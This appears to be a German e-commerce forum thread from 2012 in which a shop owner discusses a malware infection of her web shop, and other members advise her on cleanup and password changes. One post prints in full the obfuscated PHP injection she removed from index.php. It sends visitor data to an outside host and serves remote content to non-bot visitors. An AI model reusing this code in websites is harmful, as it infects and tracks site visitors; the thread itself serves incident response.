Probleme mit Malware . . .

[KathiLe]

Hallo,

habe von einer Kundin gestern morgen folgende Mitteilung erhalten:

> Vielen Dank für die Zusendung des Kleids und der anderen Teile.
> mir ist aufgefallen, dass ich nach Besuch Ihrer Website sogenannte
> Malware
> (Trojaner) auf meinem Computer hatte. Nach Bereinigung durch meinen
> IT-Fachmann, hatte ich sofort wieder die gleichen Trojaner auf meinem
> Computer, als ich auf Ihre Website ging. Könnten Sie Ihre Seite bitte
> überprüfen lassen, da anscheinend jemand dort bösartige Software
> versteckt hat.
> Gibt es eine Möglichkeit, seitens HostEurope meine Daten zu scannen?
> Vielen Dank für eine schnelle Rückmeldung und viele Grüße

Auf Anfrage teilte mir Hosteurope dann folgendes mit:

In der index.php findet sich ab Zeile 178/179 etwas seltsamer Code. Zumindest gibt es base64-codierten Quelltext welcher hier vermutlcih nicht hingehört. Innerhalb dieses Codes wird ab

http://botstatisticupdate.com/stat/stat.php

zugegriffen (Zeile 190). Wenn Ihnen diese Domain nichts sagt, ist das vermutlich der Schadcode.

Wir haben Ihnen die FTP-Logfileauszüge der letzten 7 Tage in das Root Verzeichnis Ihres Webpacks gelegt. Sie können diese Daten per FTP abrufen.

Wenn dieser Link da nicht hingehört - wo kommt der her und kann ich den einfach in der index.php löschen, ohne dass er wieder auftaucht?

 

[MBesancon]

AW: Probleme mit Malware . . .

Du solltest deine FTP-Passwörter ändern. Möglicherweise kam es über diesen Weg.

Auf jeden Fall gehört dieser Code NICHT in die Datei und sollte sofort entfernt werden!

 

[Freaky]

AW: Probleme mit Malware . . .

Was sagt denn der Shopdateien-Check? Der müsste doch da was festgestellt haben oder?

 

[KathiLe]

AW: Probleme mit Malware . . .

Nee, der hat nichts außergewöhnliches entdeckt.
Ich habe jetzt folgenden Code aus der index.php entfernt:

<?phpif (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

Und die log-Datei von Hosteurope zeigte mir folgendes an:

Auszug der Transferlogs zum FTP-Account 1160504:
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:03 +0200] "-"
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:03 +0200] "-"
RETR ftp1160504-203484 7480 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:05 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
STOR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:05 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
RETR ftp1160504-203484 7480 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:06 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"
STOR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:07 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:24 +0200] "-"
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:25 +0200] "-"
RETR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:26 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
STOR ftp1160504-203484 7546 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:27 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
RETR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:28 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"
STOR ftp1160504-203484 7546 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:29 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"

Betrifft also unsere beiden Shops - wer bitte ist "softlayer"?

 

[ag-websolutions.de]

AW: Probleme mit Malware . . .

ich würde es nicht bei einer Bereinigung der index.php belassen....

sichere die config.ini.php und das template-verzeichnis und setze den shop neu auf ...

wenn nämlich in anderen dateien noch schadcode steckt ... ist dein shop ratz fat wieder infiziert

denke auch daran sämtliche Kennwörter zu ändern (shop-datenbank, ftp-zugang, shop-admin)